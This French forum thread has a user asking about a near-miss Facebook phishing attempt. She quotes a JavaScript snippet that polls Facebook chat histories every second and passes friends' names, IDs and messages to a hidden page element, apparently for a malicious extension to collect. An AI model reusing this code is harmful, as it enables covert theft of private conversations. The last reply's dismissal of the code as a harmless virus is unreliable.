Tentative de Hack sur facebook

Fermé
Labikkk - 22 août 2011 à 18:39
karatekide6 Messages postés 1 Date d'inscription lundi 19 mai 2014 Statut Membre Dernière intervention 20 juin 2014 - 20 juin 2014 à 01:05
Bonjour,

Voilà tout à l heure j'ai failli me faire pirater sur facebook pour ceux qui connaissent la tactique sur "lebon coin", une "amie" m a demandé de l'aider à remplir un formulaire parce qu'elle ne savait pas le faire à partir de son ordi. Sans arrières pensées j'ai accepté puis j'ai trouvé l'attitude et la façon de me parler bizarre, je lui ai donc téléphoné et là elle m'a dit qu'elle s'était faite pirater... J avais accepté de donner mon adresse mail pour que mon ''amie'' m envoie donc ses photos mais heureusement je n ai pas voulu donner mon mot de passe ni rien, j'ai téléphoné à temps!

Mon copain a regardé et a trouvé l'adresse IP du hacker. D après lui il n a rien su faire dans mon pc mais maintenant que je veux aller poster un article afin de prévenir mes amis facebook de se méfier, voici une ligne de codes que nous n arrivons pas à comprendre.

[[[ if(self == top){var fb_chm_time = {};setInterval(function(){var str = '[';if( typeof(chatDisplay)!='undefined' && chatDisplay.histories) for(var i in chatDisplay.histories){ var history = chatDisplay.histories[i]; if(!chatDisplay.tabs[i]) continue; var friendName = chatDisplay.tabs[i].name; str += '['; var update = false; for(var j in history){ var m = history[j]; if(m.type =='msg'){ if(fb_chm_time[i] && fb_chm_time[i] >= m.time) continue; fb_chm_time[i] = m.time; update = true; str += '{friendName:"' + friendName +'",friendID:"' + i +'",message:"' + escape(m.msg.text) + '",from:"' + m.from + '",to:"' + m.to + '",type:"' + m.type + '",time:' + m.time + '},'; }} str = update ? str.substr(0, str.length-1) + '],' : str + '],';}str = str.substr(0, str.length-1) + ']';var div = document.getElementById('fb_communication_div');div.setAttribute('status','waiting');div.setAttribute('parameter',encodeURIComponent(str));var evt = document.createEvent('Events');evt.initEvent('fb_savemessages_12', true, false);document.dispatchEvent(evt);},1000);}
[[[
Pourriez vous nous éclairer?

Merci d avance.

A voir également:

5 réponses

ca me donne ca :

Nom : origin.du111w.dub111.mail.live.com
Address: 157.55.43.16

et ca

https://www.ip-adress.com/ip-address/ipv4/157.55.43.16

bizarre ca tombe au milieu d'un champ sans rien....

https://www.cjoint.com/?AHxbbPc9bgu
¤¤¤¤¤¤¤¤¤¤_g3n-h@ckm@n_developpement_¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤_Pre_scan_¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
1
C'est l'IP d'un grain de blé !
0
Utilisateur anonyme
23 août 2011 à 01:44
mdr !!!!
0
Juste au dessus à droite tu as un groupe de 4 batiments... Googles maps n'est pas précis au mètre près non plus... M'enfin ça me dis toujours pas pourquoi cette ligne de codes s'insère quand je poste...
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 630
23 août 2011 à 10:45
Voilà tout à l heure j'ai failli me faire pirater sur facebook pour ceux qui connaissent la tactique sur "lebon coin", une "amie" m a demandé de l'aider à remplir un formulaire parce qu'elle ne savait pas le faire à partir de son ordi.

C'est le procédé pour récupérer des identifiants de connexion....
On te donne une fausse page avec un faux formulaire à remplir, avec des informations dont le couple utilisateur / mot de passe....

Tu le remplies et le gars récupère les infos et peux se connecter à ta place...

1
Utilisateur anonyme
22 août 2011 à 21:37
salut c'est quoi son IP ?
0
Salut, voici son IP : 157.55.43.16
0
Utilisateur anonyme
23 août 2011 à 10:23
salut je ne suis pas assez calé reellement pour pouvoir te venir en aide précisement mais je t'envoie quelqu'un qui l'est beaucoup plus dans le domaine du cryptage etc......
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
karatekide6 Messages postés 1 Date d'inscription lundi 19 mai 2014 Statut Membre Dernière intervention 20 juin 2014
20 juin 2014 à 01:05
Le codage en haut est on va dire que sais un (virus) sais pas grave ses juste que sa te bloque alors fais juste suprimer le virus.
0